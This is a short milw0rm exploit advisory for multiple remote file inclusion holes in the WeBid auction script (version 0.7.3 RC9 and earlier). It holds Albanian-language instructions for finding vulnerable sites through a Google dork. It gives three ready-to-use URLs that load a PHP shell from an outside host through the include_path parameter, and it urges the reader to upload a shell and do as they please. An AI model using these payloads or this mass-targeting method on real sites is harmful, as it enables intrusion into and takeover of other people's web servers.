WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WeBid
version : <= 0.7.3 RC9
Vendor : http://sourceforge.net/projects/simpleauction
http://www.webidsupport.com/
Description : WeBid is Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.

--------------------------------------------------------------------------

Per te hackur ksi lloj scripta-sh shkoni en google.com dhe shenoni ket dork :

"copyright 2008, WEBID"

Pasi te gjeni ndonje web ateher aj eshte VULN ketu :

http://www.example.com/[path]/cron.php?include_path=http://www.khg-cr3w.net/shelli.txt??
http://www.example.com/[path]/admin/ST_brwosers.php?include_path=http://www.khg-cr3w.net/shelli.txt??
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.khg-cr3w.net/shelli.txt??

Me pas ju hapet shellii juaj RFI , uploadni shellin tuaj me pas beni cfar te doni ;-)



# milw0rm.com [2009-03-09]